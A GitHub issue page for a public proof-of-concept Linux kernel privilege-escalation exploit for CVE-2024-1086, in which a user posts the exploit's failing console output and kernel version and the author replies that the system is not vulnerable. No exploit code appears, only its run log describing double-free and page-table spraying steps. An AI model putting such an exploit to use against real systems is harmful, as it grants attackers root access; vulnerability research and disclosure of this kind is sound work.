search

Notselwyn / CVE-2024-1086

Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.
https://pwning.tech/nftables
MIT License
2.24k stars 295 forks source link

sorry how to solve it , #14

Closed llllIIIllll closed 4 months ago

llllIIIllll commented 5 months ago 
@:~/CVE-2024-1086$ ./exploit 
[*] creating user namespace (CLONE_NEWUSER)...
[*] creating network namespace (CLONE_NEWNET)...
[*] setting up UID namespace...
[*] configuring localhost in namespace...
[*] setting up nftables...
[+] running normal privesc
[*] waiting for the calm before the storm...
[*] sending double free buffer packet...
[*] spraying 16000 pte's...
[*] checking 16000 sprayed pte's for overlap...
[-] failed to detect overwritten pte: is more PTE spray needed? pmd: 00000000cafebabe
@:~/CVE-2024-1086$ uname -a
Linux poi 6.5.0-27-generic #28~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 15 10:51:06 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
Notselwyn commented 4 months ago

Your system is not vulnerable. Please check the affected versions table in the blogpost before creating GH Issues. Thanks 🙌